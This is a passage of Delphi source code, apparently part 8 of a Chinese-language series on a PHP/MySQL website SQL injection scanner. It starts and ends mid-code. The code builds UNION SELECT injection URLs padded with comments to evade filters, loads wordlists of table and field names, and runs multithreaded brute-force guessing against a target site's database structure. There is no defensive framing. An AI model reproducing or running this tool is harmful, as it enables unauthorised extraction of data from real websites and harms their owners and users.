PHP+MYSQL网站注入扫描[8]

end;
  except
  end;
finally
  idhttp.free;
end;
end;

procedure tform1.sbstop1click(sender: tobject);
begin
stoped :=true;
pg1.visible :=false;
end;

//不使用线程
procedure tform1.injtable;
var
i,j:integer;
begin
if (istr='') or (keyword='') then exit;
lsbdict.items.clear;
lvtable.items.clear;
lsbdict.items.loadfromfile(extractfilepath(application.exename)+'dict_table.txt');
j:=0;
isfinish :=false;
screen.cursor :=crhourglass;
try
  for i:=0 to lsbdict.count-1 do
  begin
    if isfinish then break;
    injurl:=url+'/**/and/**/1=1/**/union/**/select/**/'+istr+
        '/**/from/**/'+lsbdict.items+'/*';

    mm.lines.add(injurl);
    if get(injurl,keyword) then
    begin
    inc(j);
    with lvtable.items.add do
    begin
      caption :=inttostr(j);
      subitems.add(lsbdict.items);
    end;
    end;
  end;
finally
  screen.cursor :=crdefault;
end;
end;

procedure tform1.sbscan1click(sender: tobject);
var
i:integer;
begin
if (strtoint(edtfieldnum.text)<=0) or (keyword='') then exit;
lsbdict.items.clear;
lvtable.items.clear;
n :=0;
lsbdict.items.loadfromfile(extractfilepath(application.exename)+'dict_table.txt');
isfinish :=false;
for i:=1 to strtoint(edtfieldnum.text) do
  istr:=istr+','+inttostr(i);
istr :=copy(istr,2,length(istr)-1);
//在一个线程内完成表段猜解工作
scantable :=scantablethread.create(url,istr,keyword,mm,lvtable);
end;

procedure tform1.sbscan2click(sender: tobject);
var
i,j,sum:integer;
tablename:string;
begin
if lvtable.items.count<=0 then exit;
if lvtable.selcount<=0 then
begin
  msgbox('请选择一个表名！');
  exit;
end;
tablename :=trim(lvtable.selected.subitems.gettext);
if tablename='' then exit;

if isfinish=false then
begin
  lsbdict.items.clear;
  lvfield.items.clear;
  mm.clear;
  n :=0;
  lsbdict.items.loadfromfile(extractfilepath(application.exename)+'dict_field.txt');
  sum :=lsbdict.count;
  istr :='';
    pg1.min :=0;
  pg1.max :=sum;
  pg1.step :=1;
  pg1.position :=0;
  pg1.visible :=true;
  mm.lines.add('开始猜解字段。。。');
  mm.lines.add('');
  for i:=1 to strtoint(edtfieldnum.text) do
  begin
    if i=strtoint(spnum.text) then
    istr :=istr+',&fieldname&'
    else istr :=istr+','+inttostr(i);
  end;
  if istr<>'' then
    istr :=copy(istr,2,length(istr)-1);

  setlength(scanfield,sum);   // 动态设置线程的数量
  //创建多个线程完成字段猜解
  for j:=0 to sum-1 do
  begin
    //if isfinish then exit;
    scanfield[j] := scanfieldthread.create(url,istr,keyword,tablename,j,mm,lvfield);
    scanfield[j].onterminate := fieldthreadexit;
  end;
  // sbscan2.caption :='停止';
end;

try
  if isfinish=true then
  begin
    //if n>=lsbdict.count then exit;
    if sbscan2.caption='停止' then
    begin
    for j:=n to lsbdict.count-1 do
    begin
      if scanfield[j].freeonterminate then
      begin
        scanfield[j].suspend;
        scanfield[j].free;
        //scanfield[j].terminate;
      end;
    end;
    end;
    mm.lines.add('');
    mm.lines.add('字段猜解结束。。。');
  // sbscan2.caption :='猜解';
  end;
except
end;

isfinish :=true;
end;

procedure tform1.fieldthreadexit(sender: tobject);
begin
inc(n);
pg1.stepit;
if n = lsbdict.count then
begin
  isfinish :=false;
  mm.lines.add('');
  mm.lines.add('字段猜解结束。。。');
  pg1.visible :=false;
  sbscan2.caption :='猜解';
  exit;
end;
end;

procedure tform1.lvfieldclick(sender: tobject);
begin
if lvfield.selected.caption='1' then
begin
  edtfield1.text :=lvfield.items[0].subitems.gettext;
  spfield1.text :=lvfield.items[0].caption;
end else
begin
  edtfield2.text :=lvfield.selected.subitems.gettext;
  spfield2.text :=lvfield.selected.caption;
end;
end;

procedure tform1.lvtableclick(sender: tobject);
begi